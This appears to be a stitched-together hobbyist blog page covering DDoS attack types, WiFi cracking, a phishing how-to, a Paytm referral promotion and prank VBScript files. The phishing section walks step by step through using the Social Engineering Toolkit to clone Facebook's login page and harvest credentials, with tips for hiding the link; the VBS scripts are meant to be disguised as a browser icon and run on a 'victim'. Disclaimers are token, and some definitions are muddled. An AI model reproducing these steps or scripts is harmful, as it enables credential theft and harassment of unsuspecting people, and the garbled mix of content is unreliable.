DDOS Attack

Distributed denial of service attack (DDoS) definition

A distributed denial of service (DDoS) attack is a malicious attempt to make an online service unavailable to users, usually by temporarily interrupting or suspending the services of its hosting server.

A DDoS attack is launched from numerous compromised devices, often distributed globally in what is referred to as a botnet. It is distinct from other denial of service (DoS) attacks, in that it uses a single Internet-connected device (one network connection) to flood a target with malicious traffic. This nuance is the main reason for the existence of these two, somewhat different, definitions.

Broadly speaking, DoS and DDoS attacks can be divided into three types:

Volume Based Attacks
Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (Bps).

Protocol Attacks 
Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in packets per second (Pps).

Application Layer Attacks 
Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second (Rps).

Common DDoS attacks types

Some of the most commonly used DDoS attack types include:

UDP Flood

A UDP flood, by definition, is any DDoS attack that floods a target with User Datagram Protocol (UDP) packets. The goal of the attack is to flood random ports on a remote host. This causes the host to repeatedly check for the application listening at that port, and (when no application is found) reply with an ICMP ‘Destination Unreachable’ packet. This process saps host resources, which can ultimately lead to inaccessibility.

ICMP (Ping) Flood

Similar in principle to the UDP flood attack, an ICMP flood overwhelms the target resource with ICMP Echo Request (ping) packets, generally sending packets as fast as possible without waiting for replies. This type of attack can consume both outgoing and incoming bandwidth, since the victim’s servers will often attempt to respond with ICMP Echo Reply packets, resulting a significant overall system slowdown.

SYN Flood

A SYN flood DDoS attack exploits a known weakness in the TCP connection sequence (the “three-way handshake”), wherein a SYN request to initiate a TCP connection with a host must be answered by a SYN-ACK response from that host, and then confirmed by an ACK response from the requester. In a SYN flood scenario, the requester sends multiple SYN requests, but either does not respond to the host’s SYN-ACK response, or sends the SYN requests from a spoofed IP address. Either way, the host system continues to wait for acknowledgement for each of the requests, binding resources until no new connections can be made, and ultimately resulting in denial of service.

Ping of Death

A ping of death (“POD”) attack involves the attacker sending multiple malformed or malicious pings to a computer. The maximum packet length of an IP packet (including header) is 65,535 bytes. However, the Data Link Layer usually poses limits to the maximum frame size – for example 1500 bytes over an Ethernet network. In this case, a large IP packet is split across multiple IP packets (known as fragments), and the recipient host reassembles the IP fragments into the complete packet. In a Ping of Death scenario, following malicious manipulation of fragment content, the recipient ends up with an IP packet which is larger than 65,535 bytes when reassembled. This can overflow memory buffers allocated for the packet, causing denial of service for legitimate packets.

Slowloris

Slowloris is a highly-targeted attack, enabling one web server to take down another server, without affecting other services or ports on the target network. Slowloris does this by holding as many connections to the target web server open for as long as possible. It accomplishes this by creating connections to the target server, but sending only a partial request. Slowloris constantly sends more HTTP headers, but never completes a request. The targeted server keeps each of these false connections open. This eventually overflows the maximum concurrent connection pool, and leads to denial of additional connections from legitimate clients.

NTP Amplification

In NTP amplification attacks, the perpetrator exploits publically-accessible Network Time Protocol (NTP) servers to overwhelm a targeted server with UDP traffic. The attack is defined as an amplification assault because the query-to-response ratio in such scenarios is anywhere between 1:20 and 1:200 or more. This means that any attacker that obtains a list of open NTP servers (e.g., by a using tool like Metasploit or data from the Open NTP Project) can easily generate a devastating high-bandwidth, high-volume DDoS attack.

HTTP Flood

In an HTTP flood DDoS attack, the attacker exploits seemingly-legitimate HTTP GET or POST requests to attack a web server or application. HTTP floods do not use malformed packets, spoofing or reflection techniques, and require less bandwidth than other attacks to bring down the targeted site or server. The attack is most effective when it forces the server or application to allocate the maximum resources possible in response to every single request.

HTTP flood: 690,000,000 DDoS requests from 180,000 botnets IPs.

Zero-day DDoS Attacks

The “Zero-day” definition encompasses all unknown or new attacks, exploiting vulnerabilities for which no patch has yet been released. The term is well-known amongst the members of the hacker community, where the practice of trading zero-day vulnerabilities has become a popular activity.

Motivation behind DDoS attacks

DDoS attacks are quickly becoming the most prevalent type of cyber threat, growing rapidly in the past year in both number and volume according to recent market research. The trend is towards shorter attack duration, but bigger packet-per-second attack volume.

Attackers are primarily motivated by:

• Ideology – So called “hacktivists” use DDoS attacks as a means of targeting websites they disagree with ideologically.
• Business feuds – Businesses can use DDoS attacks to strategically take down competitor websites, e.g., to keep them from participating in a significant event, such as Cyber Monday.
• Boredom – Cyber vandals, a.k.a., “script-kiddies” use prewritten scripts to launch DDoS attacks. The perpetrators of these attacks are typically bored, would-be hackers looking for an adrenaline rush.
• Cyber warfare – Government authorized DDoS attacks can be used to both cripple opposition websites and an enemy country’s infrastructure.LOIC (Low Orbit Ion Cannon): an “entry-level” DoS attack tool used for cyber vandalism

solutions DDos damage

Protocol Attacks
 this type of attack by blocking “bad” traffic before it even reaches the site, leveraging visitor identification technology that differentiates between legitimate website visitors (humans, search engines etc.) and automated or malicious clients.

Wireless Attack

What is Wireless Attack

1.

Malicious activities putting at risk the security of the information and of the computing resources in wireless scenarios.

2.

A wireless attack is a malicious action against wireless system information or wireless networks; examples can be denial of service attacks, penetration, and sabotage.

Types of Wireless Attacks

Wireless Attacks can come at you through different methods. For the most part you need to worry about WiFi. Some methods rely on tricking users, others use brute force, and some look for people who don’t bother to secure their network. Many of these attacks are intertwined with each other in real world use. Here are some of the kinds of attacks you could encounter:

• Packet Sniffing: When information is sent back and forth over a network, it is sent in what we call packets. Since wireless traffic is sent over the air, it’s very easy to capture. Quite a lot of traffic (FTP, HTTP, SNMP, ect.) is sent in the clear, meaning that there is no encryption and files are in plain text for anyone to read. So using a tool like Wireshark allows you to read data transfers in plain text! This can lead to stolen passwords or leaks of sensitive information quite easily. Encrypted data can be captured as well, but it’s obviously much harder for an attacker to decipher the encrypted data packets.

• Rouge Access Point: When an unauthorized access point (AP) appears on a network, it is refereed to as a rouge access point. These can pop up from an employee who doesn’t know better, or a person with ill intent. These APs represent a vulnerability to the network because they leave it open to a variety of attacks. These include vulnerability scans for attack preparation, ARP poisoning, packet captures, and Denial of Service attacks.
• Password Theft: When communicating over wireless networks, think of how often you log into a website. You send passwords out over the network, and if the site doesn’t use SSL or TLS, that password is sitting in plain text for an attacker to read. There are even ways to get around those encryption methods to steal the password. I’ll talk about this with man in the middle attacks.
• Man in the Middle Attack: It’s possible for hackers to trick communicating devices into sending their transmissions to the attacker’s system. Here they can record the traffic to view later (like in packet sniffing) and even change the contents of files. Various types of malware can be inserted into these packets, e-mail content could be changed, or the traffic could be dropped so that communication is blocked.  
• Jamming: There are a number of ways to jam a wireless network. One method is flooding an AP with deauthentication frames. This effectively overwhelms the network and prevents legitimate transmissions from getting through. This attack is a little unusual because there probably isn’t anything in it for the hacker. One of the few examples of how this could benefit someone is through a business jamming their competitors WiFi signal. This is highly illegal (as are all these attacks), so businesses would tend to shy away from it. If they got caught they would be facing serious charges.
• War Driving: War driving comes from an old term called war dialing, where people would dial random phone numbers in search of modems. War driving is basically people driving around looking for vulnerable APs to attack. People will even use drones to try and hack APs on higher floors of a building. A company that owns multiple floors around ten stories up might assume nobody is even in range to hack their wireless, but there is no end to the creativity of hackers!
• Blueooth Attacks: There are a variety of  Bluetooth exploits out there. These range from annoying pop up messages, to full control over the a victims Bluetooth enabled device.
• WEP/WPA Attacks: Attacks on wireless routers can be a huge problem. Older encryption standards are extremely vulnerable, and it’s pretty easy to gain the access code in this case. Once someones on your network, you’ve lost a significant layer of security. APs and routers are hiding your IP address from the broader Internet using Network Address Translation (unless you use IPv6 but that’s a  topic for another day). This effectively hides your private IP address from those outside your subnet, and helps prevent outsiders from being able to directly attack you. The keyword there is that it helps prevent the attacks, but doesn’t stop it completely.

Another thing to take note of, is that our mobile devices are at risk whenever they connect to public WiFi. Whether you use a phone, tablet, or laptop; accessing an insecure network is putting a target on your data. Understand the risks or consider using a VPN.

Unauthorized AP Access

If you are in an area where other businesses or homes are in close proximity, you could encounter attempts of an attacker trying to steal WiFi credentials and gain access. This can be problematic on many levels, as a hacker might not stop at using your internet for free. Once inside your subnet, any connected device is vulnerable. This can get especially troublesome if you happen to have security cameras in your house that are connected to your wireless network.  This kind of attack often happens with WEP encryption, as it is much easier to crack than WPA/WPA2. Of course, a determined hacker can likely find a way in regardless of what encryption you use

While WPA/WPA2 are far more secure than WEP. If you have WPS enabled I can gain access pretty quick with a tool like Reaver. Even if you have followed the guidelines above, there’s still a chance I can get in your wireless network.  

Warning: Because the following contains information that could be used for illegal purposes, I want to really drill this into your head: hacking a network you do not own or have permission to attack is multiple felonies! This information is for educational purposes, particularly for aspiring cyber security professionals. If you are convicted of a felony you can be put into prison, fined heavily, you lose your right to vote, cannot own a firearm legally, and you now have to disclose your status as a convicted felon to to future employers.

If you don’t have a place to practice legally, find one or make your own. Save up some cash and build a test lab inside your home. It doesn’t need to be expensive. If you happen to be in the Columbia MD area, I can refer you to Howard Community College’s cyber defense lab. You may need to register as a student to use the facility though.

With that legal disclaimer in mind, let’s look at some of the techniques used to crack wireless router passwords.

Hacking WEP, WPS, and WPA/WPA2

WEP: If I’m honest, if you have WEP encryption you may as well name your SSID “Free WiFi” and disable the password. All I have to do is set my laptops wireless card to monitoring mode (not all wireless cards are capable of this) and see what APs are around. From here I focus in on the one I want to hack and start capturing packets and storing them into a file. If you happen to have WEP on your wireless setup (I hope not!) or you have an old wireless router laying around that you can setup to practice on, check out this tutorial for hacking WEP.

After around 10,000 packets (This doesn’t take as long as you may think) I take a shot at using a tool to crack it. If it doesn’t work I wait until I have more packets and try again. In a fairly short period of time I have a password in front of me, and access to your router. The only defense against this attack is to upgrade to WPA/WPA2 (preferably WPA2)

WPS: This takes a few more steps. If WPS is enabled on your WPA2 router it’s almost as vulnerable as one using WEP!!This article on Ars Technica will give you an in-depth look at hacking WPS. If you own a router with WPS enabled see if you can follow along. To defend yourself from this, turn off WPS on your wireless router.

WPA/WPA2: These are far more secure than WEP so long as WPS is turned off. Of course, there is still a way in. If you have a weak password, I can perform a brute force attack with a password file. Essentially, there are massive lists of already cracked passwords, words from the dictionary, default credentials, and common password variations available on the internet. In fact, Kali Linux has one built in. Of course, this method requires time, or some serious computing power. The more complex your password is, the longer this process takes. Essentially what you want to do is delay a hacker for so long that they get bored and give up.

There is another WPA2 exploit. When a router is deauthenticating and forcing a device offline to reauthenticate with a  new key, there is a short opening that can be exploited. You could configure your access point to use MAC filtering to stop this, but if the attacker is skilled enough to perform this they will easily spoof your MAC address.

Tips for Securing WiFi

Now that you don’t trust anything on the Internet anymore, let’s build that confidence back up. There are a lot of ways to make yourself less susceptible to wireless attacks.

• Use WPA2 security: This takes enough work to crack that most hackers will look for an easier target. Make sure WPS is turned off!
• Minimize Your Networks Reach: Try to position your router in the center of your home or building. There are tools available to measure the reach of your network, and you can adjust the signal level. Try to make it so that the signal beyond your walls is degraded enough that it isn’t usable. You may also consider using a directional antennae if central placement is not an option.
• Use Firewalls: Make sure your APs firewall is enabled. If you can afford a hardware firewall and feel you need the extra security, go ahead and install one. Household networks generally can get away with the standard router firewall, and operating system firewalls.
• Use a VPN on Open Networks: If you really must use public WiFi, set up a VPN. Most smartphones have this capability. You can set one up on your PC. This allows you to communicate through an encrypted tunnel back to your home or office. You can even send web traffic through a VPN.
• Update Software and Firmware: Keep your system up to date with the latest patches, and make sure any online applications you use are updated as well. Check for AP firmware updates related to security flaws, and implement them as soon as possible. Remember to follow best practices for network modification to ensure you don’t interrupt a critical task. Check out your updates in a test lab to make sure that they don’t interfere with an important application. Don’t perform updates during normal operating hours if possible, and if you must update during work hours make sure everyone is aware that network connectivity could slow down, or be cut off temporarily while you work.
• Use Strong Passwords: I recommend you use at least a 15 character password.Use a mix of upper/lowercase letters, numbers, and symbols. Again, don’t make it easy. Is the only capital letter at the start? Is there an exclamation at the end? Are there any words in there? These are common bad password practices, and hackers love them.
• Change the Login Credentials: Make sure you change the administrative login credentials. This is often something like admin/admin or admin/password by default.
• Disable your SSID (service set identifier) Broadcast: This isn’t a security measure. The right tools will still find your network’s SSID (this is the name of your network in case you didn’t know). However, there’s a small chance it could help your network fly under the radar.
• Enable MAC Filtering: Again, MAC filtering is not security. A knowledgeable hacker knows how to monitor your network and copy the MAC address of a connected device. They can then spoof their own MAC to appear as an authorized device to gain access. However, this is another annoyance for them to deal with.

It’s a good idea to monitor your network connections to look for unusual activity. If you have an Android phone you can use this free network IP scanner to see the IP addresses of connected devices. Desktops can use something like the nmap tool. For a home network with few devices, you want to find out what your devices IP addresses currently are, and see if there are any that don’t match. Be aware that if your WiFi uses DHCP (automatically assigned IP’s) that these could change over time.

Note that your router has an IP as well, most likely it will be either 10.10.1.1 or 192.168.1.1 but it may vary according to your setup. 

There are a lot of ways for hackers to come after your data, but taking these simple precautionary measures, and proactively monitoring for threats can make a world of difference. 

Phising page

How to create Phising page

It's only education purpose please don't miss use .

What is Phishing?

Phishing is a most popular technique used for hacking passwords and stealing sensitive information like credit cards, banking username & passwords etc.

Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details.

It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular.

Phishing scams prompt users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitimate web pages. In most cases, the only difference is URL. 

URL can also be spoofed in some cases if the legitimate website is vulnerable. It is difficult for a commoner to identify the phishing scams page because of its trustworthy layout.

How does phishing work?

Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user/victim will get navigated to a Phishing page that pretends to be legit. 

Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker/attacker.

• Steps of Phishing Attack:

Open the terminal window in Kali and make sure you have root access as ‘setoolkit’ needs you to have root access 

Type ‘setoolkit’ in the command line

You will be warned that this tool is to be used only with company authorisation or for educational purposes only and that the terms of service will be violated if you use it for malicious purposes.

• Type y to agree to the conditions and use the tool

• A menu shows up next. Enter 1 as the choice as in this demo we attempt to demonstrate a social engineering attack.

Under Social Engineering, there are various computer-based attacks and SET explains each in one line before asking for a choice.

• Enter 3 which will select the ‘Credential Harvester Attack Method’ as the aim is to obtain user credentials by creating a bogus page which will have certain form fields.

Now, the attacker has a choice to either craft a malicious web page on their own or to just clone an existing trustworthy site.

• Enter 2 in order to select ‘Site Cloner’

This might take a moment as SET creates the cloned page.

• Now you need to see IP address of the attacker machine. Open a new terminal window and write ifconfig
• Copy the IP address stated in ‘inet’ field

• SET will ask you to provide an IP where the credentials captured will be stored. Paste the address that you copied in the earlier step.
• Since we chose to clone a website instead of a personalised one, URL to be cloned is to be provided. In this example, it is www.facebook.com
• Social Engineering Toolkit needs Apache Server running as captured data is written to the root directory of Apache. Enter y when prompted about starting the Apache process.

The set up for a phishing attack is complete, you have cloned Facebook and hosted it on the server. SET informs us the directory at which the captured data will be stored.

The IP address is usually hidden carefully by using URL shortener services to change the URL so that it is better hidden and then sent in urgent sounding emails or text messages.

• Go to browser and type http://yourIP (eg: http://192.168.0.108) Note: I am writing this article from Maharashtra,India hence Facebook is in the native language Marathi.

If an unsuspecting user fills in their details and clicks on ‘Log In’, the fake page takes them to the actual Facebook login page. Usually, people tend to pass it off as a glitch in FB or error in their typing.

• Finally, reap the benefits. Go to /var/www/html and you can see the harvester file created there.

Hope this guide gave you a basic idea of how phishing attacks work.

Phishing is constantly evolving to entrap innocent computer users. Recommended safety tips will be to always check the URL of a website in the browser and use of two-factor authentication as it provides an extra security layer to your account.

Earning Application

Refer Earn Rs.25 PayTM Cash From Roz Dhan App | PayTM Redeem

---

Roz Dhan App, Roz Dhan App Referral Code, Roz Dhan App Download, Roz Dhan Refer Code, Roz Dhan Free PayTM Cash, Roz Dhan App Payment Proof – Hello Coolz Readers!! We Are Regularly Publishing The Free PayTM Cash Giving Apps & Free Recharge Giving Apps. Here is One More Edition into That List.

RozDhan Refer & Earn – How Get Rs.50 Sign Up Bonus Instantly :

1. First of All Download RozDhan App From Given Link Here :

2. It will Redirect your to Browser and Now Just Click on Install RozDhan Now and Earn Rs.50 Immediately Icon.

Here INVITATION CODE ::0AHHKF and 25 ruppes extra so use this invitation code

3. Now it Will Redirect you to Play Store So Just install it from Play Store and Open App.

4. It will ask you to Choose your Language so Select your Language and Go Ahead!

5. Now Enter your Unregistered Mobile Number and Continue.

6. It will Ask you to Allow all Permissions so Allow it and then Verify your Mobile Number with OTP.

7. Now Go to Earn Money Icon From Bottom and Check in to Daily Coins and Earn Extra Coins on Daily Basis.

8. Complete your Profile and Get 200 Coins Extra after Uploading Pic, DOB and Other information.

9. Go to Home Icon and Now Share or Write Articles, Share Videos, Upload Videos and on Each Views and Likes you will Get Coins.

10. Your Daily Earned Coins will automatically Convert as Cash in your Wallet on Very Next Day.

11. You can Invite Friends by Sharing your Refer Link / Code and you will Get 1250 Coins Per Refer.

12. So, Start Referring Friends and Earn Big Amount Online Using RozDhan App.

---

Rozdhan App Payment PROOF :

---

Terms & Conditions :

1. Only 200 rupees can be withdrawn at a time.

2. The maximum daily withdrawal limit is 5.

3. You will get the money within 72 hours in your paytm.

4. If you bind your Pan Card, TDS (tax) is 10%. otherwise, Its 20%

5. With the PAN Card,You can apply for a tax refund from the government ,Please make sure your information is true and consistent with your Withdraw Account.

6. Coins will be converted to rupees at 12:00 Mid Night

7. The conversion rate depends on whether your friends are active in Roz Dhan. Please confirm they open and use RozDhan.

Notepad Script

Step 1: Fake Virus Message .vbs

What does this do:

This Script just keeps popping up an annoying message saying virus alert/ virus found

Can be used as a prank. To disguise it, you will need to create a shortcut and then change the icon as the original file's icon cannot be changed.

To stop it, you will have to go to Task Manager>Processes and exit wscript.exe process

Copy to this code in your notepad and save is .vbs file::

-----------------------
   code :::::
         
                     Do

                      msgbox("VIRUS ALERT ")

                      msgbox("VIRUS FOUND ")

                      Loop

-----------------------

Step 2: Pure Evil Virus .vbs

What does this do: 

This Script scares the hell out of you (or your vitim) by saying that Drive C has to be formated

Can be used as a prank. To disguise it, you will need to create a shortcut and then change the icon as the original file's icon cannot be changed.

Copy to this code in your notepad and save is .vbs file::

-----------------------

code:::::

Msgbox "Your computer has been infected by a virus",16,"Warning !"

dim x,yes,no

x=Msgbox("Virus has infected hard drive (C:). Deletion of the virus will require complete formatting of hard drive (C:). Would you like to format hard drive (C:) ?",52,"Warning !")

if x=6 then

dim box

box=Msgbox("Hard drive (C:) formatting complete. In order to function correctly your computer must restart, would you like to restart now ?",36,"Formatting has been completed")

if box=6 then

Msgbox "Fatal error, code 08x48631643.B-7",16,"ERROR"

Msgbox "Just kidding, this was all a joke, but i did scare you didn't I ? Héhé...",64,"Made by Shayan"

end if

if box=7 then

Msgbox "Fatal error, code 08x48631643.B-7",16,"ERROR"

Msgbox "Just kidding, this was all a joke, but i did scare you didn't I ? Héhé...",64,"Made by Shayan"

end if

end if

if x=7 then

Msgbox "Fatal error, code 08x48631643.B-7",16,"ERROR"

Msgbox "Just kidding, this was all a joke, but i did scare you didn't I ? Héhé...",64,"Made by Shayan"

end if

-----------------------

Step 12: More Pure Evilness .vbs

What does this do:

 This Script really is pure evil. It keeps typing HA HA HA everywhere.

Don't use it yourself.

To prank your victim, you will need to disguise it. To disguise it, you will need to create a shortcut and then change the icon as the original file's icon cannot be changed. Set the icon to something the victim would normally click on, like browser.

To stop it, you will have to go to Task Manager>Processes and exit wscript.exe process

Some Anti-Virus will delete it

-----------------------

Code:::

Set wshShell = wscript.CreateObject("WScript.Shell") 

do 

wscript.sleep 100 

wshshell.sendkeys "HA " 

loop

-----------------------